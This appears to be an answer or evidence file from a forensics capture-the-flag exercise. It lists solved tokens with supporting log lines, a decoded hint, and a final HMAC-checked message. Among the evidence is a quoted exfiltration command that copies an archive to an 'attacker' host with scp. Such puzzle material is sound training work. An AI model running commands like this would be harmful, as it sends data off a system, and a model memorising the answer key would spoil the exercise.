TOKEN[KEYPAD]=7055
EVIDENCE[KEYPAD].TOP24=192.0.2.0/24
EVIDENCE[KEYPAD].COUNT=55
EVIDENCE[KEYPAD].SAMPLE=2025-08-09T12:01:17Z lab1 sshd[3405]: Failed password for admin from 192.0.2.70 port 53632 protocol 2
EVIDENCE[KEYPAD].MALFORMED_SKIPPED=2
TOKEN[DNS]=lines
EVIDENCE[DNS].KEY=hint4
EVIDENCE[DNS].DECODED_LINE=Signals converge in the beacon if you read between lines.
TOKEN[SAFE]=13-9-22
EVIDENCE[SAFE].MATCH=SAFE{13-9-22}
EVIDENCE[SAFE].CHECK=13+9=22
TOKEN[PID]=225
EVIDENCE[PID].PATH=[217->220->221->225]
EVIDENCE[PID].CMD="scp /tmp/x.tgz attacker@198.51.100.33:/upload"
FINAL_GATE=PENDING
MSG=msc-group-02|7055-lines-225-13-9-22
EXPECTED_HMAC=d57b140fd4acf4d1f0c2b3180e20596b50984a418c2b2bfb9f7006ec36ea04e2